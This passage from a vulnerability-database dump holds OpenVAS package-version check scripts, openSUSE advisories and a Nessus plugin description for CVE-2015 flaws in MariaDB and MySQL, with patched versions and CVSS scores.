res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22. Please see the MariaDB 10.0 Release\nNotes for further details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes", "modified": "2017-07-07T00:00:00", "published": "2015-10-31T00:00:00", "id": "OPENVAS:703385", "href": "http://plugins.openvas.org/nasl.php?oid=703385", "type": "openvas", "title": "Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3385.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3385-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703385);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4895\", \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-10-31 00:00:00 +0100 (Sat, 31 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3385.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mariadb-10.0 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name: \"summary\", value: \"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22. Please see the MariaDB 10.0 Release\nNotes for further details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4910", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-10-27T00:00:00", "id": "OPENVAS:1361412562310842503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842503", "type": "openvas", "title": "Ubuntu Update for mysql-5.6 USN-2781-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for mysql-5.6 USN-2781-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842503\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-27 07:08:00 +0100 (Tue, 27 Oct 2015)\");\n script_cve_id(\"CVE-2015-4730\", \"CVE-2015-4766\", \"CVE-2015-4792\", \"CVE-2015-4800\",\n \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4833\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4862\", \"CVE-2015-4864\",\n \"CVE-2015-4866\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4890\",\n \"CVE-2015-4895\", \"CVE-2015-4904\", \"CVE-2015-4910\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for mysql-5.6 USN-2781-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql-5.6'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in\nMySQL and this update includes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.5.46 in Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\nUbuntu 15.04 and Ubuntu 15.10 have been updated to MySQL 5.6.27.\n\nIn addition to security fixes, the updated packages contain bug fixes,\nnew features, and possibly incompatible changes.\n\nPlease see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-26.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_tag(name:\"affected\", value:\"mysql-5.6 on Ubuntu 15.10,\n Ubuntu 15.04,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2781-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2781-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.6\", ver:\"5.6.27-0ubuntu0.15.04.1\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0ubuntu0.12.04.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.6\", ver:\"5.6.27-0ubuntu1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "Oracle Linux Local Security Checks ELSA-2016-0534", "modified": "2019-03-14T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310122922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122922", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0534.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122922\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 14:33:01 +0300 (Wed, 06 Apr 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0534\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0534 - mariadb security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0534\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0534.html\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4913\", \"CVE-2016-0505\", \"CVE-2016-0546\", \"CVE-2016-0596\", \"CVE-2016-0597\", \"CVE-2016-0598\", \"CVE-2016-0600\", \"CVE-2016-0606\", \"CVE-2016-0608\", \"CVE-2016-0609\", \"CVE-2016-0616\", \"CVE-2016-2047\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-embedded\", rpm:\"mariadb-embedded~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-embedded-devel\", rpm:\"mariadb-embedded-devel~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:43:04", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found here:\n\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10022-release-notes/\">https://kb.askmonty.org/en/mariadb-10022-release-notes/</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10022-changelog/\">https://kb.askmonty.org/en/mariadb-10022-changelog/</a>\n\n The following build problems were fixed:\n\n * bsc#937787: fix main.bootstrap test (change default charset to utf8 in\n test result)\n\n", "edition": 1, "modified": "2015-12-10T12:13:12", "published": "2015-12-10T12:13:12", "id": "OPENSUSE-SU-2015:2244-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00010.html", "type": "suse", "title": "Security update to MariaDB 10.0.22 (important)", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T11:23:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found here:\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\">https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/</a>\n\n", "edition": 1, "modified": "2015-12-10T13:10:14", "published": "2015-12-10T13:10:14", "id": "OPENSUSE-SU-2015:2246-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00011.html", "title": "Security update to MariaDB 5.5.46 (important)", "type": "suse", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:22:46", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-1793", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-1789", "CVE-2015-0286", "CVE-2015-4910", "CVE-2015-0288", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-3152", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "MySQL was updated to 5.6.27 to fix security issues and bugs.\n\n The following vulnerabilities were fixed as part of the upstream release\n [boo#951391]: CVE-2015-1793, CVE-2015-0286, CVE-2015-0288, CVE-2015-1789,\n CVE-2015-4730, CVE-2015-4766, CVE-2015-4792, CVE-2015-4800, CVE-2015-4802,\n CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830,\n CVE-2015-4833, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4862,\n CVE-2015-4864, CVE-2015-4866, CVE-2015-4870, CVE-2015-4879, CVE-2015-4890,\n CVE-2015-4895, CVE-2015-4904, CVE-2015-4905, CVE-2015-4910, CVE-2015-4913\n\n Details on these and other changes can be found at:\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html\">http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html</a>\n\n The following security relevant changes are included additionally:\n\n * CVE-2015-3152: MySQL lacked SSL enforcement. Using\n --ssl-verify-server-cert and --ssl[-*] implies that the ssl connection\n is required. The mysql client will now print an error if ssl is\n required, but the server can not handle a ssl connection [boo#924663],\n [boo#928962]\n\n", "edition": 1, "modified": "2015-12-10T12:12:21", "published": "2015-12-10T12:12:21", "id": "OPENSUSE-SU-2015:2243-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00009.html", "type": "suse", "title": "Security update to MySQL 5.6.27 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T03:45:54", "description": "The version of MariaDB running on the remote host is prior to 5.5.46.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified flaws exist related to the\n Partition subcomponent that allow an authenticated,\n remote attacker to cause a denial of service.\n (CVE-2015-4802, CVE-2015-4792)\n\n - An unspecified flaw exists related to the Query Cache\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4807)\n\n - An unspecified flaw exists related to the DDL\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4815)\n\n - An unspecified flaw exists related to the Types\n subcomponent that allows an authenticated, remote\n attacker to gain access to sensitive information.\n (CVE-2015-4826)\n\n - An unspecified flaw exists related to the\n Security:Privileges subcomponent that allows an\n authenticated, remote attacker to affect the integrity\n of the system. No other details are available.\n (CVE-2015-4830)\n\n - An unspecified flaw exists related to the SP\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4836)\n\n - Multiple unspecified flaws exist related to the DML\n subcomponent that allow an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4858,\n CVE-2015-4913)\n\n - An unspecified flaw exists related to the InnoDB\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4861)\n\n - An unspecified flaw exists related to the Parser\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4870)\n\n - A flaw exists in the mysql_prepare_create_table()\n function due to improper handling of a comma buffer that\n is greater than zero. An authenticated, remote attacker\n can exploit this to cause a denial of service condition.", "edition": 28, "published": "2015-12-04T00:00:00", "title": "MariaDB < 5.5.46 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_46.NASL", "href": "https://www.tenable.com/plugins/nessus/87210", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87210);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n \"CVE-2015-4807\",\n \"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\"\n );\n script_bugtraq_id(\n 77137,\n 77145,\n 77153,\n 77165,\n 77171,\n 77190,\n 77205,\n 77208,\n 77222,\n 77228,\n 77237\n );\n\n script_name(english:\"MariaDB < 5.5.46 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is prior to 5.5.46.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified flaws exist related to the\n Partition subcomponent that allow an authenticated,\n remote attacker to cause a denial of service.\n (CVE-2015-4802, CVE-2015-4792)\n\n - An unspecified flaw exists related to the Query Cache\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4807)\n\n - An unspecified flaw exists related to the DDL\n subcomponent that allows 